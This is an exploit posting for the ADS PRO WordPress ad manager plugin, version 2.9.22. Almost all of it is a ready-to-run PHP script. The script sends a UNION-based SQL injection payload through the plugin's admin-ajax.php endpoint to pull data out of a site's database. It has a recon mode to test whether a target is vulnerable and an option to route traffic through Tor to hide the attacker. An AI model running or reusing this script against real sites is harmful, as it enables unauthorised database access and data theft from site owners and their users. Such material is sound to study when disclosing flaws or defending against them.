WordPress ADS PRO 2.9.22 Multi-Purpose Ad Manager Exploit
Posted on 30 November -0001
<?php /** * Exploit Title: ADS PRO - Multi-Purpose WordPress Ad Manager Exploit * Google Dork: N/A * Exploit Author: <contact@wp0day.com> * Vendor Homepage: http://codecanyon.net/item/ads-pro-multipurpose-wordpress-ad-manager/10275010 * Software Link: http://codecanyon.net/item/ads-pro-multipurpose-wordpress-ad-manager/10275010 * Version: Version 2.9.22, possible 2.9.24 * Tested on: Debian 8, PHP 5.5.9 * Type: Blind SQLInjection * Time line: Exploit found [01-May-2016], Author contacted: [01-May-2016], Author fixed [???], [RD:1] */ require_once('curl.php'); //OR //include('https://raw.githubusercontent.com/svyatov/CurlWrapper/master/CurlWrapper.php'); $curl = new CurlWrapper(); $options = getopt("t:s:r:",array('tor:')); print_r($options); $options = validateInput($options); if (!$options){ showHelp(); } if ($options['tor'] === true) { echo " ### USING TOR ### "; echo "Setting TOR Proxy... "; $curl->addOption(CURLOPT_PROXY,"http://127.0.0.1:9150/"); $curl->addOption(CURLOPT_PROXYTYPE,7); echo "Checking IPv4 Address "; $curl->get('https://dynamicdns.park-your-domain.com/getip'); echo "Got IP : ".$curl->getResponse()." "; echo "Are you sure you want to do this? Type 'wololo' to continue: "; $answer = fgets(fopen ("php://stdin","r")); if(trim($answer) != 'wololo'){ die("Aborting! "); } echo "OK... "; } function inject($sql){ global $curl, $options; $data = array("action"=>'bsa_stats_clicks_callback', 'ad_id'=>'-1 UNION ALL SELECT 1,2,3,4,5,6,7,('.$sql.'),9 -- '); $curl->post($options['t'].'/wp-admin/admin-ajax.php', $data); $resp = $curl->getResponse(); preg_match('~<td>(((?!</td>).)*)</td>(s+)<td><span class~isu', $resp, $mat); if (isset($mat[1])){ return $mat[1]; } } if (isset($options['s'])){ echo "SQL Injection "; $sql = $options['s']; echo "Query: $sql "; echo "Response: ".inject($sql)." "; } elseif (isset($options['r'])) { echo "Doing a Recon "; $rand = mt_rand(92123,7632232); if (inject('SELECT '.$rand) == $rand){ echo "Host: ".$options['t']. " IS VULNERABLE! :) "; } else { echo "Host: ".$options['t']. " IS *NOT* VULNERABLE! :( "; } echo " "; } function validateInput($options){ if ( !isset($options['t']) || !filter_var($options['t'], FILTER_VALIDATE_URL) ){ return false; } if (!preg_match('~/$~',$options['t'])){ $options['t'] = $options['t'].'/'; } $options['tor'] = isset($options['tor']); return $options; } function showHelp(){ global $argv; $help = <<<EOD ADS PRO - Multi-Purpose WordPress Ad Manager Exploit (wp0day.com <contact@wp0day.com>) Usage: php $argv[0] -t [TARGET URL] -tor [USE TOR?] -b [Blind SQLInjection] -r [Reco] [TARGET_URL] http://localhost/wordpress/ Examples: php $argv[0] -t http://localhost/wordpress --tor yes -s 'select version()' php $argv[0] -t http://localhost/wordpress --tor yes -r test -r Recon, will check if the install is vulnerable -s SQL, will run the query and returns the response Misc: CURL Wrapper by Leonid Svyatov <leonid@svyatov.ru> @link http://github.com/svyatov/CurlWrapper @license http://www.opensource.org/licenses/mit-license.html MIT License EOD; echo $help." "; die(); }
